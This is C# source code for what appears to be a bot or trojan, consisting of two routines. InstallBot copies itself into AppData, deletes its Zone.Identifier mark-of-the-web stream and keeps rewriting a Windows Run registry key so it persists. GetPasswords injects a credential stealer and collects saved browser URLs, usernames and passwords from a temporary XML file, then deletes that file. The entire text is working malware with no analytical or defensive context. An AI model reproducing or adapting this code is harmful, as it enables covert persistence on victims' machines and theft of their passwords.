public static Boolean InstallBot() { try { String strDropPath = CUtils.GetAppData(); if (String.IsNullOrEmpty(strDropPath)) { return(false); } String strMainPath = CUtils.GetMainPath(); if (String.IsNullOrEmpty(strMainPath)) { return(false); } strDropPath += strFileName; if (strDropPath == strMainPath) { new Thread(delegate() { while (bRegistryPersistance) { CRegistry.SetRegValue(CUtils.IsElevated() ? Registry.LocalMachine : Registry.CurrentUser, @"Software\Microsoft\Windows\CurrentVersion\Run", strRegistryName, strDropPath); DateTime dtNextAdd = DateTime.Now.AddSeconds(15); while (dtNextAdd > DateTime.Now && bRegistryPersistance) { Thread.Sleep(10); } } }).Start(); return(true); } File.Copy(strMainPath, strDropPath, true); CKernel32.DeleteFile( string.Format( "{0}:Zone.Identifier", strDropPath) ); if (CRegistry.SetRegValue(CUtils.IsElevated() ? Registry.LocalMachine : Registry.CurrentUser, @"Software\Microsoft\Windows\CurrentVersion\Run", strRegistryName, strDropPath)) { Process.Start(strDropPath); } } catch { } Application.Exit(); return(false); }
public static String GetPasswords() { String strPasswords = String.Empty; try { String strRandomFilename = String.Format("{0}.xml", String.Concat(CUtils.GetAppData(), CUtils.RandomString(CUtils.RandomInt(5, 15)))); if (InjectStealer(strRandomFilename)) { try { Process pStealer = Process.GetProcessById(iStealerPID); pStealer.WaitForExit(); } catch { } if (!File.Exists(strRandomFilename)) { return(strPasswords); } try { using (XmlReader PasswordReader = XmlReader.Create(strRandomFilename)) { SPassword CurrentPassword = new SPassword(); while (PasswordReader.Read()) { if (PasswordReader.IsStartElement()) { switch (PasswordReader.Name) { case "url": if (PasswordReader.Read()) { CurrentPassword.strURL = PasswordReader.Value.Trim(); } break; case "web_browser": if (PasswordReader.Read()) { CurrentPassword.strBrowser = PasswordReader.Value.Trim(); } break; case "user_name": if (PasswordReader.Read()) { CurrentPassword.strUsername = PasswordReader.Value.Trim(); } break; case "password": if (PasswordReader.Read()) { CurrentPassword.strPassword = PasswordReader.Value.Trim(); strPasswords += CurrentPassword.ToString(); CurrentPassword = new SPassword(); } break; default: break; } } } } } catch { } if (File.Exists(strRandomFilename)) { File.Delete(strRandomFilename); } } } catch { } return(strPasswords); }